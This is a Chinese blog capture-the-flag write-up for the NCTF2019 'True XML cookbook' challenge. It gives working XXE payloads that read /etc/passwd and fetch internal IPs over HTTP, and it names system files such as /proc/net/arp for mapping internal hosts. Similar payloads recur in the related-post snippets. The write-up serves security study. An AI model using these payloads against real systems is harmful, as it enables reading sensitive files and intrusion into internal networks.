[NCTF2019]True XML cookbook

最新推荐文章于 2024-05-10 12:02:09 发布
最新推荐文章于 2024-05-10 12:02:09 发布
阅读量936 收藏 3
点赞数 1
分类专栏: CTF刷题记录 文章标签: xml Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/121872315
版权

[NCTF2019]True XML cookbook

知识点:XXE

解题过程

在这里插入图片描述

根据之前做的[NCTF2019]Fake XML cookbook,利用上次的payload

这个payload的意思是 xml中的&admin;变成了外部文件/etc/passwd中内容,导致敏感信息泄露。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>

可以成功读取文件/etc/passwd

在这里插入图片描述

但是这次不能直接看/flag了
学习大佬们的wp,得知需要查看内网存活主机:/etc/hosts

在这里插入图片描述
结果是并没有可以用的信息
继续查看另一个文件:/proc/net/arp

在这里插入图片描述
找到了这些主机,http访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "http://10.0.86.10">
]>
<user><username>&admin;</username><password>123456</password></user>

10.0.86.6找到了flag

在这里插入图片描述

一些其他关于内网的文件

/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie

参考链接

1.超级详细的讲解: 一篇文章带你深入理解XXE漏洞
2. 从XML相关一步一步到XXE漏洞

Sk1y
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 337
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 377
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
[NCTF2019]True XML cookbook(xxe技巧)
EC_Carrot的博客
12-21 568
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进到去跟fack那个题目差不多,直接用那里的payload看看 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE a [ <!ENTITY abc SYSTEM "file:///flag"> ]> <user><username>&am
[NCTF2019]True XML cookbook + XXE攻击内网
ShenZ的博客
09-09 568
XXE XXE除了基本的读文件,还有很多用法,比如探测、攻击内网。能与其他一些漏洞结合起来使用。 读取/etc/hosts与/proc/net/arp推得内网存活主机ip wp [NCTF2019]True XML cookbook 和Fake XML cookbook差不多,尝试读passwd flag不在本机,所以XXE攻击内网 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin S
[NCTF2019]True XML cookbook --不会编程的崽
不会编程的崽的博客
02-21 940
xxe ssrf 配合
虹膜图像识别matlab程序
10-09
%用霍夫曼方法对上述像素概率编码 b=fliplr(sort(b));%按降序排列 T=b; [m,n]=size(b); B=zeros(n,n-1);%空的编码表(矩阵) for i=1:n B(i,1)=T(i);%生成编码表的第一列 end r=B(i,1)+B(i-1,1);%最后两个元素相加 T(n-1)=r; T(n)=0; T=fliplr(sort(T)); t=n-1; for j=2:n-1%生成编码表的其他各列 for i=1:t B(i,j)=T(i); end K=find(T==r); B(n,j)=K(end);%从第二列开始,每列的最后一个元素记录特征元素在该列的位置 r=(B(t-1,j)+B(t,j));%最后两个元素相加 T(t-1)=r; %把相边的值排在后面 T(t)=0; %把最后一个数清空 T=fliplr(sort(T)); %重新进行降序排列 t=t-1; end END1=sym('[0,1]');%给最后一列的元素编码 END=END1; t=3; d=1;
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
[NCTF2019]True XML cookbook 1
snowlyzz的博客
05-05 548
又是一道关于XML注入的题 xml语法: <?xml version="1.0" encoding="UTF-8"?> //xml声明 ​ <!DOCTYPE copyright [ //DTD(文档类型定义) ​ <!ELEMENT note (to,reset,login)> //定义元素 ​ <!ENTITY test SYSTEM "url"> //定义外部实体test ​ ]> 直接抓包! <...
5月10日学习记录
weixin_74020633的博客
05-10 747
这题是关于xxe漏洞的实际应用,利用xxe漏洞的外部实体来进行ssrf探针内网的主机和[NCTF2019]Fake XML cookbook的区别就在于xxe漏洞的利用方向,一个是命令执行,一个是SSRF看题,打开环境,熟悉的登录框正常的抓包进行分析,明显的xxe漏洞开始构造,先查看xxe漏洞能不能正常利用存在xxe漏洞并且能够正常利用,我在做题时想的是直接查看flag文件报错了,说明flag这个文件不存在,也许我们在外网不能正常访问,xxe的漏洞利用就可以探针内网,尝试访问内网看看。
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值